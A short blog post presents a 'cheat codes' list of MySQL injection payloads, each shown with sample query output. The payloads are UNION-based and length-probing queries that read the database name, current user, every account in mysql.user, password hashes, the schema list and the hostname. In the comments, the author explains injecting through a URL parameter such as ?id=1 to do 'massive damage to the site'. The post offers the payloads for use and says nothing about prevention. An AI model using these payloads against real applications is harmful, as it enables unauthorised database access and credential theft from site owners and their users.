MySQL Injection Cheat Codes

It’s been a crazy day . since this is my first writing on this blog . I thought of writing about little bit of cheat codes for SQL Injection . SQL Injection is been there for like a very long time . yet peoples make the same mistakes when this develop applications. Alright lets go trough the codes

Database

SELECT * FROM test WHERE id=-1 UNION SELECT database(),null,null limit 0,1--

Length of the databsase

SELECT * FROM test WHERE id=1 and LENGTH(database())<10
SELECT * FROM test WHERE id=1 and LENGTH(database())=4

Users

SELECT * FROM test WHERE id=-1 UNION SELECT null,(select(user())),null --
SELECT * FROM test WHERE id=-1 UNION SELECT null,(select(current_user())),null --

Getting current user name

mysql> SELECT * FROM test WHERE id=-1 UNION SELECT 1,current_user(),3 --;
+----+----------------+-------+
| id | name           | title |
+----+----------------+-------+
|  1 | root@localhost | 3     |
+----+----------------+-------+
1 row in set (0.00 sec)

mysql> SELECT * FROM test WHERE id=-1 UNION SELECT null,(select group_concat(user) from mysql.user),null --;
+------+-------------------------------------------------+-------+
| id   | name                                            | title |
+------+-------------------------------------------------+-------+
| NULL | root,debian-sys-maint,phpmyadmin,root,test,root | NULL  |
+------+-------------------------------------------------+-------+
1 row in set (0.03 sec)

getting user host and password hash from users tables in mysql database

mysql> SELECT * FROM test WHERE id=-1 UNION SELECT null,(select concat(host,user,password) from mysql.user limit 0,1),null --;
+------+--------------------------------------------------------+-------+
| id   | name                                                   | title |
+------+--------------------------------------------------------+-------+
| NULL | localhostroot*4DCF17E4A473BC86597EAC5225CBA80E11123CB2 | NULL  |
+------+--------------------------------------------------------+-------+
1 row in set (0.00 sec)

Database List

mysql> SELECT * FROM test WHERE id=-1 UNION SELECT 1,schema_name,3 FROM information_schema.schemata limit 0,1--;
+----+--------------------+-------+
| id | name               | title |
+----+--------------------+-------+
|  1 | information_schema | 3     |
+----+--------------------+-------+

Hostname

mysql> SELECT * FROM test WHERE id=-1 UNION SELECT null,@@hostname,null;
+------+------------------+-------+
| id   | name             | title |
+------+------------------+-------+
| NULL | ubuntu-VADDW16FA | NULL  |
+------+------------------+-------+
1 row in set (0.01 sec)

2 thoughts on “MySQL Injection Cheat Codes

    • well it depends Bashir ,I’ll make my explanation very simple for you . you know where you see see Get requests in websites like http://example.com/index.php?id=1. the id parameter pass the value 1 . in the php code the MySQL query should look like this SELECT * FROM sometable where column_id=1 . if its a insecure query handling we might be able to do a SQL Injection do a massive damage to the site

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s